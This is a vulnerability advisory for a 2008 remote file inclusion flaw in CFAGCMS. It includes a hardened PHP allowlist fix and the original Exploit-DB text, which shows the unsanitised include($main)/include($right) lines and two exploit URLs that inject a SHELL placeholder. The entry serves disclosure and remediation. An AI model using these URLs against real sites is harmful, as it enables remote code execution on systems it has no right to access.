Vendor: CFAGCMS
By: BeyazKurt - Bey4zKurt@Gmail.Com
CVSS: 7.5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: CFAGCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

CFAGCMS

CFAGCMS is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

To mitigate this vulnerability, user input must be validated and filtered before being used in filesystem operations.
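
One way to apply this mitigation to the two `include()` calls in themes/default/index.php, shown as an added example that is not CFAGCMS code. It assumes PHP 7 or later and that the theme is meant to pick its two fragments from the `main` and `right` request parameters; the `parts` directory, the fragment names and `resolve_fragment()` are hypothetical.

```php
<?php
// Added example, not CFAGCMS code. Hardened replacement for:
//   include($main);  include($right);
// Assumption: fragment files live in a "parts" directory beside this
// theme file. Directory and file names are hypothetical.

const FRAGMENT_DIR = __DIR__ . '/parts';

// Allowlist: logical name => file name. The request only ever selects
// a key; no request data becomes part of a filesystem path or URL.
const FRAGMENTS = [
    'home'    => 'home.php',
    'news'    => 'news.php',
    'sidebar' => 'sidebar.php',
];

function resolve_fragment(string $key, string $default): string
{
    // Unknown keys (including URLs and traversal strings) fall back
    // to the default fragment instead of reaching include().
    $file = FRAGMENTS[$key] ?? FRAGMENTS[$default];

    $base = realpath(FRAGMENT_DIR);
    $path = realpath(FRAGMENT_DIR . '/' . $file);

    // realpath() returns false for missing files and resolves symlinks,
    // so the prefix check also rejects a fragment linked outside the
    // fragment directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('fragment unavailable');
    }
    return $path;
}

// Array-valued parameters (?main[]=x) are treated as absent.
$mainKey  = is_string($_GET['main'] ?? null)  ? $_GET['main']  : 'home';
$rightKey = is_string($_GET['right'] ?? null) ? $_GET['right'] : 'sidebar';

include resolve_fragment($mainKey, 'home');
include resolve_fragment($rightKey, 'sidebar');
```

Keeping PHP's `allow_url_include` setting at `Off` is a second layer, since it stops `include` from fetching URL wrappers even if an unvalidated value reaches it.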
Source

Exploit-DB raw data:

Author : BeyazKurt - Bey4zKurt@Gmail.Com

Script : CFAGCMS
Download : http://sourceforge.net/project/showfiles.php?group_id=197936

Vuln :

Page themes/default/index.php, Line 15-16 :

<?php include($main);?>
<?php include($right);?>

Site.Com/cfagcms/themes/default/index.php?main=SHELL
Site.Com/cfagcms/themes/default/index.php?right=SHELL

SHQİPTAR!
Should I say something about politics? :p
 
FENERBAHÇEE (H)

# milw0rm.com [2008-12-14]